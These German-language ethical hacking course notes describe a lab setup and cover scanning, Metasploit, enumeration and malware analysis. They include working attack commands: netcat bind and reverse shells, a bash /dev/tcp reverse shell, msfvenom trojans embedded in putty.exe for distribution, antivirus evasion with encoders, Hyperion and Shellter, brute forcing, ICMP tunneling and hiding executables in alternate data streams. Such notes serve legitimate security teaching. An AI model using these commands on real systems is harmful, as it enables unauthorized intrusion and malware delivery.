Ethical Hacking, der Komplettkurs
Labor
Es werden Folgende Instanzen auf dem esxi benötigt:
- Kali → Dies wird das Arbeits-System
- Metasploitable 2 → Ein unsicheres System zum Scannen (Nicht im Internet sichtbar!)
- Win7 → System um Windows-Hacks zu testen (idealerweise ohne Updates)
- Win10 → um die Unterschiede zu Win7 zu zeigen
- Windows AD-Server für die AD und LDAP-Hacks
- Talis als Live CD → Livesystem um unerkannt im Internet Daten zu sammeln
- Aktueller Ubuntu Server → DAU-Server um Dienste scannen zu können
Um sowohl 32Bit wie auch 64Bit Systeme angreifen zu können muss auf Kali die wine 32Bit-Umgebung nachinstalliert werden:
dpkg --add-architecture i386 && apt update && apt install wine32
Anmerkung: Ich verwende statt Kali lieber Parrot OS
Exkurs VNC
- Installation:
apt install tightvncserver - Konfiguration:
nano ~/.vnc/xstartup
#!/bin/sh unset DBUS_SESSION_BUS_ADDRESS [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" & x-window-manager & mate-session & and just to be sure, we’ll make it executable
- Ausführbar machen:
sudo chmod +x ~/.vnc/xstartup
- Erster Start:
vncserver
- Auf dem Client:
vncviewer 192.168.178.21:1
Grundlagen
| Begriffe | |
|---|---|
| Exploit | Systematische Möglichkeit Schwachstellen auszunutzen |
| Zero Day Attack | Angriff, der eine Schwachstelle ausnutzt für die es keinen Patch gibt |
| Vulnerability | Schwachstellen im Design oder Implementierung |
| Payload | Der Teil des Exploit der die Aktion ausführt |
| Hack Value | Die Belohnung des Hackers → Schwere des Angriff/Schaden |
| Bot | Ein Bot ist ein Stück Software |
| Daisy Chaining | Die Möglichkeit ein infiziertes System als Sprungbrett zu verwenden |
| Doxing | Veröffentlichen von komprimierenden Daten → Cybermobbing |
| Schutzziele | |
|---|---|
| Vertraulichkeit | Daten dürfen nur von Autorisierten Personen genutzt werden |
| Integrität | Daten dürfen nicht unbemerkt verändert werden |
| Verfügbarkeit | Zugriff auf Daten muss im vereinbarten Zeitraum möglich sein |
| Autentizität | Die Bestätigung der Echtheit und Vertrauenswürdigkeit von Daten |
| Verbindlichkeit | Stellt die Nicht-Abstreitbarkeit von Handlungen sicher |
| Zurechnebarkeit | Handlungen können immer einem Benutzer zugeordnet werden |
Bedrohungen im Überblick
The Onion-Web
- | Installieren
apt-get install torbrowser-launcher
- | Ausführen
torbrowser-launcher
Siehe: https://computingforgeeks.com/installing-tor-browser-on-linux-mint-ubuntu/
Seiten im Darknet finden
Webseiten aus dem Darknet enden oft mit *.onion Diese Seiten findet man als Liste unter
Hidden Surfing
Vulnerability Management (VM)
Unter Vulnerability Management versteht man eine Methode der immer wiederkehrenden Sicherheitsanalyse. Nachdem die Vorbereitungen einmal getroffen wurden und der Vulnerability-Assessment-Lifecycle eingerichtet ist, kann ein Pentest mit Auswertung und Fehlerbehebung stark automatisiert werden. Dazu sind nötig:
Vorbereitungen
- Rollen und Verantwortungen der Mitarbeiter festlegen
- Was soll geprüft werden (Systeme, Dienste, Netzwerk)
- Welche Tools sollen verwendet werden
- Erstellen von SLAs uns Policies
Nachdem also festgelegt wurde wer was und womit getestet werden soll kann dies dokumentiert werden. So ist auch rechtlich der Pentest abgesichert.
Assess (Beurteilung)
In diesem Schritt erden die Scans durchgeführt, bewertet und ein Report erstellt
Priorize (Priorisieren)
Die im Report dokumentierten Schwachstellen werden bewertet
- Höhe des Risiko
- Aufwand und Kosten der Behebung
- Mögliche Folgen der Behebung
Act (Ausführen)
Je nach Priorität werden die gefundenen Schwachstellen behandelt
- Hohes Risiko → Fehler schnell beheben
- Geringes Risiko → Können wir mit der Bedrohung leben?
- Hoher Aufwand → Können wir die Mittel den Fehler zu beheben beschaffen?
- Geringer Aufwand → Direkt umsetzten
Informationsbeschaffung
| URL | Name | Funktion / Inhalt | |
|---|---|---|---|
| https://searchdns.netcraft.com/ | Netcraft | Search Web by Domain | |
| https://www.whatsmydns.net/ | WhatsMyDNS | Prüfe die Domainverfügbarkeit weltweit | |
| https://dnsdumpster.com/ | DNS Dumpster | DNS Enumeration | |
| http://web.archive.org/ | WebArchive | Internet Archiv (Wayback Machine) | |
| https://www.shodan.io/ https://beta.shodan.io/search/examples | Shodan Filter | Web Browser mit zusätzlichen Filterfunktionen Beispiele | zusatzmaterial_07-59_shodan.pdf |
| https://webmii.com/ http://www.yasni.de/ https://www.identcheck.net/ | webmii Yasni Argus | Personensuchdienste | |
| https://www.blogmojo.de/google-suchoperatoren/ | Blogmojo | Liste der Google Suchoperatoren (Google Hacking) | |
| https://www.exploit-db.com/google-hacking-database | GHDB | Google Dork Database | |
| https://www.nmmapper.com/ | Nmapper | Kostenpflichtige Toolsammlung | |
| https://viewdns.info/ | ViewDNS | kostenfreie Toolsammlung |
Scanning
Methoden: Host-Discovery → Portscan → Dienst und OS-Erkennung → Vulnerability-Scan
- Umgehen von Firewalls
- Banner Grabbing
- Einsatz von Proxies und Anonymisierer
Das OSI-Modell
Enemeration
nmap
| Name | Scan | Beschreibung |
|---|---|---|
| Standard Subnet-Scan (Ping) | nmap -sL 192.168.178.0/24 | Stealth Ping Scan |
| Standard Portscan | nmap -sS nmap -sU -p 53,69,111 <Ziel-IP> –reason | UDP mit Reason |
| Ack Scan | nmap -sA | wird von Firewall gefiltert? |
| IP-ID-Scan | nmap -Pn -p- <Zombie-IP> <Ziel-IP> -d | Portscan über Zombie Jumphost |
| Diensterkennung | nmap <Ziel-IP> -sV | Erkennt meist auch die Version |
| OS-Erkennung | nmap <Ziel-IP> -O | |
| Decoy Scan | nmap -D <Fake-IP1,Fake-IP2,Fake-IPn>,ME,<Own-IP> <Tiel-IP> | Decoy = Fake (idealerweise 6+ Decoys) |
| Spoof | nmap -s <Fake-IP> <Ziel-IP> | |
| Textausgabe | nmap -oG <Name.txt> <Ziel-IP> | Grepable Ausgabe in Datei |
| XML | nmap -oX <Name.xml> <Ziel-IP> –webxml | via Webbrowser darstellbar |
| Best Practice | nmap -A -T4 -F -v <Ziel-IP> |
Nmap Scripte
Pfad: /usr/share/nmap/scripts
| Einzelne *.nse ausführen | nmap –script <script1>,<script2> <Ziel-IP> | |
| Alle Scripte | nmap –script /usr/share/nmap/scripts <Ziel-IP> | Dauert sehr lange (-T insane) |
Metasploit (msf)
Einrichten
systemctl start postgresql # Datenbank starten systemctl enable postgresql # Autostart der DB msfdb init # Initiierung msfconsole # msf Konsole starten db_status # DB abfragen workspace -a Lab # Workspace anlegen workspace # Workspaces listen workspace -h # Zeigt die Hilfe für workspace
Backup
db_export -f xml /root/msfdb_backup # erstellt ein db-Backup
Kommandos
msfconsole # startet msf workspace Lab # In Workspace wechseln show # Listet alle Module show auxiliary # Zeigt Module einer Kategorie search scanner # Sucht alle Scanningmodule
Ein Modul verwenden (hier: ssh_version)
use auxiliary/scanner/ssh/ssh_version # Ein Modul zur Verwendung laden (info options) set rhosts <Ziel-IP> # Ziel setzten run # Start hosts # Zeigt gefundene Hosts in der DB services # Zeigt gefundene Dienste in der DB
nmap verwenden
db_nmap -T4 -A -v 192.168.178.0/24 # Verwendet einen nmap-Scan und speichert Ergebnis in der msf-DB db_nmap -sU -p161 192.168.178.0/24 --open # SNMP-Agent Scan
Sploits suchen
searchsploit Local Priv | wc -l # Zeigt Menge an gefundenen Treffer zu "Local Priv" Sploits searchsploit Local Priv |grep -i ubuntu # Schränkt die Suche um Treffer mit "ubuntu" ein
NetBIOS Enemeration
nbtscan -r 192.168.178.0/24 enum4linux -v <Ziel-IP>x nmap -p 139,445 --script "smb-enum*" <Ziel-IP>
SNMP Enemeration
nmap-Scripte für einen SNMP-Scan: ls /usr/share/nmap/scripts/ | grep snmp
nmap -sU -p 161 --script "snmp*" <Ziel-IP>
msf
use auxiliary/scanner/snmp/snmp_enum options set rhosts <Ziel-IP>
onesixtyone
vim community.list # Datei mit SNMP Community-Strings erstellen for ip in $(seq 1 254); do echo 192.168.178.$ip;done > ip_address-list # IP Liste onesixtyone -c community.list -i ip_address-list -d
LDAP
Zusatzmaterial: Konfiguration eines AD-Controller
nmap
nmap -O -sV -p 389,636 --open <Ziel-IP>
jxplorer
apt install jxplorer # Instalation on Kali jxplorer # Startet das Tool
SMTP
Email Enemaration
Via telnet Port 25 zum Mailserver verbinden RCPT TO = Recipient to VRFY = Verify EXPN = Expand
smtp-user-enum
erstelle Datei mailuser.txt -> pro Zeile eine Mailadresse smtp-user-enum -M VRFY -U mailuser.txt -t <Ziel-IP>
DNS
unter msf: db_nmap -sU -sS -p 53 <Ziel-Netz> --open
Zonentransfer
dnsrecon -n <Ziel-IP> -d <domainname> # Liest Zonentransfer Daten aus dnsrecon -n <Ziel-IP> -r 192.168.178.1-192.168.178.254 -d fritz.box # Liste aller bekannten Domain-Hosts
FTP
starte msf use exploit/unix/ftp/vsftpd_234_backdoor set rhost <Ziel-IP> run
Vulnability-Scanner
✔ Schneller umfassender Test
✔ Meist ist die Ausgabe gut aufbereitet
✔ Kann ohne tiefes Fachwissen ausgeführt werden
✘ Ein sehr „lauter“ Scan, der schnell auffällt
✘ Durch die Voreinstellung in der Regel wenig konfigurierbar
✘ Das Netz und die Dienste werden zum Teil hoch belastet → Gefahr von Ausfall
✘ Gefahr von falschen Aussagen die aufgrund der Automatisierung vorkommen können
nmap
nmap --script vuln <Ziel-IP>
GVM
Installation auf Ubuntu (https://www.xinux.net/index.php/GVM_Installation)
Installation auf Kali https://www.linuxmaker.com/linux/kali-linux-openvas.html und https://www.agix.com.au/installing-openvas-on-kali-in-2020/
Installation auf Ubuntuserver https://www.libellux.com/openvas/#configuration-files und https://pentestit.de/gvm-20-08-auf-ubuntu-server-20-04-installieren/
Anmerkung: GVM ist der Nachfolger von OpenVAS
apt install gvm* gvm-setup gvm-check-setup WARNING: Your password policy is empty. SUGGEST: Edit the /etc/gvm/pwpolicy.conf file to set a password policy.
Passwort ändern:
gvmd --user=admin --new-password=<NeuesPasswort>
Post Install
vim /etc/default/greenbone-security-assistant GSA_PORT=9392
Start / Stop
gvm-start gvm-stop
Der Dienst ist unter https://127.0.0.1:9392 erreichbar. Login mit erstelltem User
Firefox remote verwenden:
ssh -C -Y username@servername -> Login mit PW firefox 127.0.0.1:9392
Firewall aktivieren:
apt-get install ufw ufw enable ufw allow 80 ufw allow 9392 ufw allow 22
Phasen eines Systemangriffs
Zugang verschaffen
Default Logins mit msf scannen
use auxiliary/scanner/postgres/postgres_login set RHOSTS <Ziel-IP> run
postgres_login anpassen, wenn Passwörter bekannt sind
show options
PASS_FILE -> Dateipfad merken und Datei mit bekannten PW ergänzen
Im Ordner der Datei sind mehrere Dateien anderer Default-Passwort-Listen
USER_FILE -> Dateipfad merken und Datei mit bekannten User ergänzen
Mail-Hack mit medusa
How it works: medusa -M smtp -q
Vorbereitung:
- Liste mit bekannten mailadressen (txt, pro Zeile eine Mailadresse) → user.list
- Liste mit warscheinlichen Passwörter (txt, pro Zeile ein Passwort) → pass.list
Starte
medusa -h <smtp-Mailserver FQDN> -U user.list -P pass.list -s -M smtp
Hydra
hydra -l Nutzer – P Passwortliste.txt ftp://192.168.0.1 xhydra startet die GUI
Backdoor mit nc
nc als Server auf Kali starten
ncat -lp 4444 # Startet netcat als Server auf Port 4444
unter Kali die Datei /usr/share/windows-binaries/nc.exe auf einen Winows-PC kopieren und in der cmd ausführen.
nc <SERVER-IP> 4444 # startet einfache Verbindung
Datei mit nc übertragen
c:\nc>nc -nlvp > wget.exe 4444 # startet nc als Server unter Port 4444, schreibt aber den std Out in die Datei wget.exe nc <Server-IP> 4444 < /usr/share/windows-binaries/wget.exe # nc auf Kali starten und die Datei wget.exe übertragen
Bind-Shell mit nc
ncat -nlvp 4444 -e /bin/bash # startet nc und piped /bin/bash darüber c:\nc>nc <Server-IP> 4444 # startet nc auf Windows und stellt so die Shell des Servers zur Verfügung c:\nc>nc -nlvp 4444 -e cmd.exe # startet nc auf Windows und piped cmd.exe ncat <Server-IP> 4444 # startet nc auf Linix und stellt die cmd des Servers zur Verfügung
Reverse Shell mit nc
ncat -nlvp 443 # startet einen Listener auf dem Server ncat -nv <Server-IP> -e /bin/bash # startet auf dem Client nv und tunnelt eine bash durch den Port 443 zum Server bash -i >& /dev/tcp/<Server-IP>/443 0>&1 # startet eine Shell und tunnelt sie zur Server-IP Port 443
Privilegien Eskalation
msf starten und in den passenden Workspace wechseln Falls vorhanden in den vuls nach distcc suchen (vulns) Nach einer passenden Exploit suchen (search distcc) Exploit verwenden (use exploit/unix/misc/distcc_exec) RHOST setzen (set RHOST <Client-IP>) Payload setzten (set PAYLOAD cmd/unix/reverse_bash) ausführen (exploit)
meterpreter für Windows
Erstellen des Trojaner um aud einem Windows-Zielsystem eine meterpreter-Shell zu starten die sich zu unserem Server verbindet
msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.178.124 LPORT=443 -f exe -o mp_shell.exe LHOST= IP des Kali Angreifer LPORT= Port der Komunikation (muss an der FW offen sein) -f = Art der Ergebnisdatei -o = Name der Ergebnisdatei
Trojaner zB auf einem Webserver zur Verfügung stellen.
Auf Kali eine msfconsole mit Multihandler starten
msfconsole use exploit/multi/handler set payload windows/meterpreter_reverse_https # Nutzt das https Payload set lhost <eigene-IP> set lport 443 exploit
Jetzt kann die Datei auf dem Windows-Ziel gestartet werden. In der meterpreter-Shell wird eine neue Shell (von Windows) angezeigt.
Anmerkung: Einfacher geht es mit SET: Bypass Windows Defender and Fake image for Reverse shell
das gleiche für Linux
msfvenom --payload linux/x86/shell/reverse_tcp LHOST=127.0.0.1 LPORT=45678 --format py --bad-chars '\x00\x09\x20\x0a\xff' -o mp_shell.py
Externe Module nachladen: load (2xtab)
Weitere Infos: https://null-byte.wonderhowto.com/how-to/simplify-payload-creation-with-msfpc-msfvenom-payload-creator-0180240/
Malware
Macro-Virus
Trojaner
1. Carrier Applikation bereitstellen. Dies ist eine Applikation in der der Trojaner eingebaut werden soll.
msfvenom -p windows/meterpreter_reverse_tcp LMHOST=192.168.178.124 LPORT=8080 -x /hom/home/andre/putty.exe -k -f exe -o /var/www/html/putty2.exe
- -p definiert den Payload → eine TCP reverse Shell auf Windows
- LMHOST ist die vom Ziel erreichbare IP des Kali
- LPORT ist der zur Kommunikation eingesetzte Port
- -x welcher Carrier (32Bit) wird bereit gestellt
- -k Der Carrier soll auch ausgeführt werden (ohne k wird nur der Trojaner aktiviert)
- -f Die Output-Datei soll einene exe sein
- -o Ziel der Output-Datei (idealerweise gleich der Webserver, zur einfachen Verbreitung)
2. Meterpreter-Session auf Kali starten
msfconsole use exploit/multi/handler set payload windows/meterpreter_reverse_tcp set LHOST 192.168.178.124 set LPORT 8080 run
3. Trojaner auf Zielsystem bereitstellen und ausführen Wird putty auf Windows ausgefüher, statet zusätzlich eine rev. Shell. Diese beendet sich aber wenn putty geschlossen wird. Daher muss die Shell jetzt an ein andese Programm gehängt werden.
4. Von putty auf „explorer“ umhängen
ps -S explorer # Die PID von explorer finden -> hier 336 migrate 336
Jetzt steht eine Shell zum Zielsystem zur Verfügung
Payloads tarnen
Methoden der Tarnung:
- Encoder verändern den Binärcode
- Packer zum komprimieren, dekomprimieren sich bei Ausführung selbstständig
- Crypter verschlüsseln
- Embedder und Wrapper betten den Schadcod in ein harmloses Programm ein
- Customized Code ist selbst geschriebener Code, dessen Signatur noch nicht bekannt ist
Encoder
msfvenom -l encoder
Verwenden wir als Beispiel „Shikata ga nai“
msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.178.124 LPORT=443 -f exe -e x86/shikata_ga_nai -i 130 -o /var/www/html/putty_shi.exe * Bekannter Befehl um in putty einen Trojaner zu betten * -e Auswahl des Encoders * -i Anzahl an Iterationen
Mehrere Encoder nacheinander verwenden
msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.178.124 LPORT=443 -f exe -e x86/countdown .i 10 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 130 -o double-ent.exe * Verwendet zuerst den Encoder countdown mit 10 Iterationen und danach shikata mit 130 Iterationen * Datei wird als double-ent.exe lokal gespeichert
Fazit: Encoder sind nicht sehr hilfreich um an Virenscanner vorbei zu kommen. Selbst der Einsatz von mehreren Encodern bringt nicht viel.
Verschlüsseln mit Hyperion
Die 32Bit-Umgebung von wine muss installiert sein (Siehe Vorbereitungen)
cd /usr/share/windows-resources/hyperion wine hyperion.exe /var/www/html/putty2.exe /var/www/html/putty-crypt.exe
Fazit: Hyperion ist altbekannt und wird fast immer als Virus erkannt.
Shellter
apt install shellter # Geht nicht auf Kali, dafür auf Parrot schon installiert Operation-Mode: A PE Target : Der Pfad zur *.exe die infiziert werden soll
Alle weiteren Eingaben sind selbsterklärend. Das Ergebnis steht dann in dem Ordner /usr/share/windows-resources/shellter/ zur Verfügung. Unter /usr/share/windows-resources/shellter/Shellter_Backups findet man ein Backup der nicht infizierten Originaldatei. Fazit: Weniger als die Hälfte der Virenscanner erkennen diese Datei als Virus
Root Kits
- Kernel Rootkits (LKM) Laden sich als Modul in den Kernel nach und manipulieren Systemaufrufe
- Userland Rootkits verwenden manipulierte DLL die über eine API eines Programms dessen Funktion ändern oder erweitern
ICPM Tunneling Covert Channel
Arbeiten auf allen Clients
apt install gcc git make cd opt git clone https://github.com/DhavalKapil/icmptunnel make
Am Server (Kali)
cd /op7/icmptunnel ./icmptunnel -s 10.0.1.1 # Immer diese IP angeben das ist die ICMP-Router-IP ifconfig # taucht eine tun auf, läuft der Server
Auf dem Ziel
vim /opt/icmptunnel//client.sh # route add -host <server> gw <gateway> dev <interface # Zeile auskommentieren ./icmptunnel -c <Kali-IP>
Ab jetzt wird die Kommunikation zwischen der Servern als ICMP-Pakete getarnt
Alternate Data Streams (ADS)
Für Windows NTFS: Daten an harmlosen Dateien anhängen und so verstecken.
Textdatei erstellen: harmlos.txt und speichern cmd starten und in das Verzeichnis der eben erstellten Datei wechseln notepad harmlos.txt:geheim.txt -> Die Datei geheim.txt wird erstellt und kann bearbeitet werden
Die neue Datei geheim.txt ist nirgendwo zu sehen. Auch hat sich der Inhalt von harmlos.txt nicht geändert. Mit dem Befehl
notepad harmlos.txt:geheim.txt
kann wieder auf den versteckten Inhalt zugegriffen werden. Das geht auch mit ausführbaren Inhalt
type c:\ordner\ virus.exe c:\ordner\harmlos.txt:virus.exe start harmlos.txt:virus.exe # führt virus.exe aus dir -r # zeigt Ordnerinhalt inklusive ADS (ab Win 7)
Keylogger und Spyware
Malware Analyse
Statische Malare Analyse (Code-Analyse)
Programm dekompilieren und Quellcode analysieren oder nach Ausrücken im Code suchen mit den Tools:
- strings (Windows für die CMD)
- pestudio (Windows mit GUI)
Dynamische Malware Analyse (Laufzeitanalyse)
Verhalten eines Sample (Schad-Programm) in Echtzeit beobachten. Dies muss in einer Sandbox durchgeführt werden.
- JOESandbox
- AnyRun
Verdächtiges Verhalten analysieren
Auf Windows-Clients muss geprüft werden:
- Virencheck
- Offline via Rescue-Disk (zB Kasperky Rescue Disk)
- Antivirus-Tools testen mit dem eicar-String
- X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
- oder mit auf der eicar Homepage vorgefertigten Dateien
- Prozessaktivitäten
- Taskmanager aufrufen und die Spalten Prozessname und Begehlszeile hinzu fügen
- Der Process-Explorer. Er kann Prozesse mit Virus-Total Checken
- Der Process-Monitor gibt weitere Auskünfte über laufende Prozesse
- Netzwerkaktivitäten
- netstat -nap tcp für die CMD
- Als Admin eine CMD starten und netstat -nabp tcp → zeigt auch die zugehörigen Prozesse
- unter Linux: netstat -tlpn
- Besser ist es ein externes Tool zu verwenden wie zB Nirsoft currports
- DNS und die Datei hosts checken. Dazu eignet sich das Tool Query Sniffer an
- Windows Registry
- Der Reg Scanner ist eine bessere Alternative als regedit
- regshot erstellt einen Snapshot der Registry. Danach können weitere Shots mit der Referenz verglichen werden.
- Autostart-Einträge
- Taskmanager
- Bessere Alternative: Autoruns zusammen mit Process-Explorer
- Windows Dienste
- services.msc
- Alternative: http://foxplanet.de/ → Service Manager
- Treiber
- msinfo.exe
- Bessere alternative: Driver View
- Integrität und Signaturen
- sigverif in einer CMD ausführen
- Einsatz von Sniffer
- Der Sniffer Malwarebites zeigt PUP und PUA an und kann diese reparieren (gibt es auch für Android)
- Der HijackThis überprüft ob Betriebssystem-Einstellungen von Malware geändert wurden.
integrität mit Tripwire prüfen
apt install tripwire tripwire --init vim /etc/tripwire/twpol.txt # /var/run # /var/log # /root/.* (außer bashrc bash_* und ICE*) # /proc twadmin -m P /etc/tripwire//twpol.txt tripwire --init tripwire --check
Entsprechend der Fehler muss die twpol.txt angepasst werden. Danach kleines Script schreiben um via Cronjob das Ergebnis zu mailen
Sheep-Dip Systeme
Ein System (idealerveise eine VM) die mit üblichen Monitoring und Sicherheits-Tolls ausgestattet ist. In dieser vom Firmennetz abgetrennten Stand-Alone Maschine können Daten und Programme getestet werden ohne das Produktivsysteme beeinflusst werden können.
Siehe: http://sheepdip.sourceforge.net/
Sandboxen
Steganografie
Linguistische Steganografie ist das Verstecken einer Botschaft innerhalb eines Textes. Siehe: https://www.spammimic.com/encode.shtml
Die technische Steganografie nutzt das Verstecken von digitalem Inhalt in unauffälligen Medien wie zB Bilder oder Musikdateien.
Information in Bilder verstecken
Dazu verwendet man das letze Bit der Farbinformation jedes Pixel. Dadurch verringert sich der Farbraum um ca 10%, was nicht auffällt. Dabei ergeben 3 RGB-Pixel ein 8-Bit-Zeichen. Siehe:
stegosuite -e -f <Geheime.Datei> -k <passwort> <Bild.jpg> # Der Payload darf je nach Bildgröße nicht zu groß gewählt werden stegosuite x <Bild.lpg> -k <passwort> # Extrahiert die Datei
Hier gibt es weitere Infos: https://www.blackmoreops.com/2017/01/11/steganography-in-kali-linux-hiding-data-in-image/
Information in beliebigen Dateien verstecken
Links und Dokumente
| HaveIbeenPwned | Willst du wissen ob dein Passwort einfach zu hacken ist weil es schon auf Listen steht |
| BeEF in Kali | BeEF in Kali nutzen |
| Virustotal Nodistribute | Testet Dateien ob sie von antivirus-Systemen als Virus erkannt wird |
| Install Metasploit | Howto install Metasploit in Termux |
| inxi -Fxzd | Befehl um so ziemlich alles von einem Linux zu erfahren |
| Netzpolitik | Für alle die keine Gedult haben… |
| Autopsy | Sleuth Kit Autopsy in-depth tutorial |
| Nirsoft FoxPlanet | Windows Toolsammlungen |
| Leitfaden IS-Pentest | Ein Praxis-Leitfaden für IS-Penetrationstests des BSI |
| Mine | Wo hast du deine Daten hinterlassen? |
| arpspoof | Man in the Middle Angriffe |




